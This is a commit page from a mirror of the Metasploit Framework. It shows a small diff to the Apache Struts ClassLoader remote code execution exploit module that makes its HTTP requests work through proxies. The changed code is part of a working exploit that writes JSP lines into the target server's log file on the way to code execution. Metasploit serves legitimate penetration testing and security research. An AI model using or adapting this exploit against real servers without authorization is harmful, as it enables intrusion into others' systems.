infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Change HTTP requests to succeed when going through HTTP proxies

bug/bundler_fix
julianvilas 2015-02-04 15:32:14 +01:00
parent df22ed2132
commit de09559cc8
1 changed files with 10 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

13
modules/exploits/multi/http/struts_code_exec_classloader.rb
View File

@ -97,9 +97,13 @@ class Metasploit3 < Msf::Exploit::Remote
def dump_line(uri, cmd = "") def dump_line(uri, cmd = "")
res = send_request_cgi({ res = send_request_cgi({
'uri' => uri+cmd, 'uri' => uri,
'encode_params' => false,
'vars_get' => {
cmd => ""
},
'version' => '1.1', 'version' => '1.1',
'method' => 'GET', 'method' => 'GET'
}) })
res res
@ -232,8 +236,11 @@ class Metasploit3 < Msf::Exploit::Remote
# Dump the JSP to the log file # Dump the JSP to the log file
print_status("#{peer} - Dumping JSP into the logfile...") print_status("#{peer} - Dumping JSP into the logfile...")
random_request = rand_text_alphanumeric(3 + rand(3)) random_request = rand_text_alphanumeric(3 + rand(3))
uri = normalize_uri("/", random_request)
jsp.each_line do |l| jsp.each_line do |l|
unless dump_line(random_request, l.chomp) unless dump_line(uri, l.chomp)
fail_with(Failure::Unknown, "#{peer} - Missed answer while dumping JSP to logfile...") fail_with(Failure::Unknown, "#{peer} - Missed answer while dumping JSP to logfile...")
end end
end end